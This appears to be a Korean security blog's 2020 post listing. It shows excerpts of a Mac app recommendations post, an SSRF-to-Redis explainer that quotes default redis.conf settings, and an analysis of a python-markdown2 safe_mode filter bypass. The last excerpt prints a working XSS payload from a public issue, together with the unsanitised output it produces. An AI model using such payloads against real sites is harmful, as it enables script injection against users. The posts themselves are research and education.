2020의 게시물 표시

나의 유용한 맥 앱

이미지
맥북을 사용하면서 좋았던 앱들을 추후에도 까먹지 않고 사용하기 위해 기록하여 남겨두려고 작성하게 되었습니다. Last Update: 2020-05-27 - Snappy (무료) Link:  https://apps.apple.com/app/snappyapp/id512617038 화면 캡처 및 관리 도구 분석 중에 화면을 왔다 갔다 하면서 봐야 하는 경우 아래 그림과 같이 스크린샷을 찍으면 해당 화면에 고정적으로 나오게 할 수 있어서 분석한 코드 보면서 PoC코드 짜거나 할 때 편하다. - Tunnelblick (무료) Link:  https://tunnelblick.net/downloads.html openVPN client, 맥 사용자 대부분이 사용하길래 따라서 사용했는데 크게 불편한 부분은 없어서 계속 사용 중. - Keka (무료) Link:  https://www.keka.io/ 윈도우랑 맥에서 압축 관련해서 파일 제목 깨지는 경우가 많은데 Keka 사용하면 압축이 잘 풀린다. - MTMR (무료) Link:  https://mtmr.app/ Github:  https://github.com/Toxblh/MTMR 터치바 커스텀 마이징. Json 형태로 이루어진 설정 파일 수정을 통해 원하는 터치바로 꾸밀 수 있다. - parallels (유료) Link:  https://www.parallels.com/ 가상화 프로그램. 맥 사용하면서도 은행/업무 등의 이유로 윈도우 또는 리눅스 사용해야 해서 구매하게 되었다. 블랙 프라이데이 할인으로 사면 조금은 저렴하게 구매할 수 있다.

SSRF to Redis

SSRF (Server-Side Request Forgery) SSRF는 서버의 요청을 변조하여 원하는 데이터 또는 원하는 타겟에 대해 서버의 자원을 이용해 요청을 보내는 공격 방법입니다. 다수의 마이크로 서비스로 이루어지는 모던 스택 또는 다른 서비스와 상호작용하는 형태에서 다른 서비스에 접근하여 취약점을 유발하는 SSRF취약점의 가치는 증가하게 되었습니다. Redis Key-Value 데이터 모델을 가진 NoSQL 데이터베이스입니다. 데이터를 메모리에 저장하는 인메모리 데이터베이스로 read/write 속도가 빠르다는 장점으로 대중적으로 많이 사용되고 있습니다. Redis는 왜 해커의 타겟이 되었나? Redis는 SSRF취약점 발생 시 주로 타겟이 되는 서비스 중 하나입니다. 이에 대한 이유는 아래와 같다고 생각됩니다. - 인증 체계 기본적으로 Redis는 인증 체계가 없으며, bind 127.0.0.1, port 6379로 서비스가 설정됩니다.  redis.conf의 내용 중 port와 bind에 대한 내용입니다. ```apache # Accept connections on the specified port, default is 6379. # If port 0 is specified Redis will not listen on a TCP socket. port 6379 ... # By default Redis listens for connections from all the network interfaces # available on the server. It is possible to listen to just one or multiple # interfaces using the "bind" configuration directive, followed by one or # more IP addresses. # # Examples: # # bind 192.168.1.100 10.0.0.1 bind 12...

[python-markdown2] safe_mode Filter bypass 분석글

이미지
개요 * 작성일 기준 version: 2.3.8 ( https://github.com/trentm/python-markdown2/tree/4d2fc792abd7fbf8ddec937812857f13fded61cf ) CTF하다가 markdown2 모듈을 사용하길래 해당 모듈 찾아보다가 아래 이슈를 발견하였다. https://github.com/trentm/python-markdown2/issues/341 Filter Bypass ????!! - Expected Result ```python >>> import markdown2 >>> markdown2.markdown("[<script>alert(1)</script>]()", safe_mode=True) '<p><a href="#">[HTML_REMOVED]alert(1)[HTML_REMOVED]</a></p>\n' ``` - Issue Payload ```python >>> import markdown2 >>> markdown2.markdown('<http://g<!s://q?<!-<[<script>alert(1);/\*](http://g)->a><http://g<!s://g.c?<!-<[a\\*/</script>alert(1);/*](http://g)->a>', safe_mode=True) '<p><http://g<!s://q?<!-&lt;<a href="http://g"><script>alert(1);/*</a>->a><http://g<!s://g.c?<!-&lt;<a href=...